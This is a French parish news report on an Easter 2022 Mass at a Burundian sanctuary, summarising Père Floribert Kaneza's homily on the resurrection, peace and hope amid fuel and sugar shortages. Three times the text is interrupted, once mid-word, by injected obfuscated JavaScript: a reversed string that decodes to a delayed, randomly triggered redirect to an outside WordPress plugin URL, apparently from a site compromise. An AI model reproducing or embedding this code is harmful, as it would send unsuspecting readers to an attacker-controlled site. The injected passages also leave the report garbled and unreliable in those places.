La joie de Pâques que nous avons commencée à savourer dès la nuit de samedi saint se poursuit, même la participation des fidèles dans ces jours ne fait que s’accroître, ce qui ne laisserait aucun toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doute qu’il y a du neuf. La Messe de 10 heures à la Pâques de cette année 2022 au Sanctuaire de la Reine de la paix et la réconciliation a été présidée par le Père Floribert Kaneza. Le résonnement du tambour s’est fait entendre en ce jour. Trois chorales étaient bien en place pour animer la Messe de ce jour. Il s’agissait de la chorale Sancta Maria, Sainte Maria Goretti et Pueri Cantores Maria Goretti. Les lectures du jour étaient respectivement tirées du Livre des Actes des Apôtres (10, 34a. 37-43), l’épitre de saint Paul aux Colossiens (3, 1-4) et l’Évangile selon saint Jean (20, 1-9).
Dans son homélie, le Père KANEZA a annoncé que nous sommes dans la joie de Pâques, c’est pourquoi même le tambour s’est fait entendre pour annoncer cette solennité si grandiose. La résurrection c’est le fondement de notre foi, nous l’avons entendu dans l’Evangile. Quand les deux disciples sont accourus vers la tombe de Jésus, Jean y est arrivé mais il y est entré le second après Pierre. Il a regardé et il a cru. Celui qu’on avait condamné, accusé de se faire Dieu est ressuscité. Actuellement, trois endroits attirent un grand nombre de pèlerins : les pyramides d’Egypte, le palais de Westminster en Angleterre et la tombe de Jésus. Mais sur cette dernière, il y a un écrit qui dit : Il n’est plus là, il est ressuscité. Tous les enseignements de l’Eglise sont basés sur la résurrection de Jésus, même l’apôtre Pierre l’a déclaré quand il était chez Corneille. Avec la résurrection de Jésus, nous avons la garantie de ressusciter nous aussi. Mais encore, en ce jour, nous sommes déjà ressuscités en Jésus Christ car nous avons en nous sa vie.
Il est vrai que nous avons des difficultés dans la vie, mais en ce jour, Jésus vient nous apaiser en disant ‘N’aie pas peur, j’ai vaincu la mort’. Actuellement, les Burundais souffrent du manque de pétrole, du sucre en plus des maladies qui ont toujours été d’actualité. Malgré tout cela, Jésus vient noud dire d’être tranquilles. En plus, la résurrection de Jésus toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donne sens à nos prières et elles sont exaucées. La suite de cela est pour nous de nous comporter comme des hommes et des femmes de paix et de réconciliation. Ceci signifie que la paix que nous recherchons est en Jésus Christ, et ce n’est qu’en lui et lui seul que nous devons trouver cette paix. Après l’avoir eue, allons sans tarder la partager avec les autres.
Au niveau de notre comportement, la résurrection de Jésus le Christ nous exige à ne pas être hypocrites. Nous devons montrer notre vraie face devant Dieu et notre prochain. La souffrance est une étape que nous ne devons pas échapper ou gronder, elle fait partie de notre vie, tout comme la période de joie. Nous le savons très bien, nous fêtons Pâques après avoir célébré le Vendredi Saint. Gartoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dons notre espoir en Dieu, et notre vie sera changée pour devenir semblable à celle de Jésus. Nous devons partager cette joie de Pâques avec la Vierge Marie, elle qui a toujours été avec Jésus même au pied de la croix. Prions les uns pour les autres pour que nous gardions cette union à Jésus par Marie. Amen.
Signalons en clôturant qu’il a suffisamment plu pendant la Messe de dimanche de Pâques, ce qui a laissé à penser que la bénédiction du ciel a comble la terre et les hommes de paix.
Nyandwi M.